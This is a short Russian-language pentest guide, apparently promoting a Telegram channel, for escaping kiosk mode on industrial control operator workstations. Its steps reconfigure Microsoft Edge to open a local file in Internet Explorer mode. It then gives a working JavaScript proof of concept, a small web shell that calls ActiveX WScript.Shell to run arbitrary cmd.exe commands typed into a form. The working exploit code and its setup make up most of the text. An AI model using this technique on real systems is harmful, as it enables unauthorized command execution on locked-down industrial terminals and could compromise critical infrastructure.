Обход режима Киоска

При проведении тестирования модели "белый ящик" на предприятиях АСУТП вы можете встретиться с "Киоском" - режим ограниченного функционала, как на терминалах, где вы привыкли заказывать вкусные бургеры.

Ваша первоначальная задача вызвать cmd.exe для дальнейших манипуляций. 

Данный скрипт является одним из возможных векторов выполнения этой задачи в браузере Edge. 

Описание выполнения:

Мы собираемся запустить Microsoft Edge в режиме Internet Explorer и для этого выполните следующие шаги:

1) создадим файл pwn.html с содержанием, которое будет чуть ниже (через ctrl+s)

2) в нашем браузере Edge мы перейдем в Настройки> Default browser: 

Здесь мы можем установить для опции “Allow sites to be reloaded in Internet Explorer mode ” - “Allow”,

а также уже добавим полный путь к нашей предстоящей веб-оболочке: на вкладке “Internet Explorer mode pages”.  

Например, file:////C:/Users/operatorARM/Desktop/pwn.html

3) Жмем Restart

4) Обратите внимание на всплывающее приглашение внизу страницы с просьбой разрешить заблокированный контент. Мы продолжим и разрешим указанный контент.

5) Нам нужно будет разрешать всплывающее окно каждый раз, когда мы выполняем команды.

# JS exploit for KIOSK (ASM)

```Java Script POC

<script>

  function shlExec() {

    var cmd = document.getElementById('cmd').value

    var shell = new ActiveXObject("WScript.Shell");

    try {

      var execOut = shell.Exec("cmd.exe /C \"" + cmd + "\"");

    } catch (e) {

      console.log(e);

    }

    var cmdStdOut = execOut.StdOut;

    var out = cmdStdOut.ReadAll();

    alert(out);

  }

</script>

<form onsubmit="shlExec()">

  Command: <input id="cmd" name="cmd" type="text">

  <input type="submit">

</form> 

 ```

Мой ТГ канал: https://t.me/pentest_mentor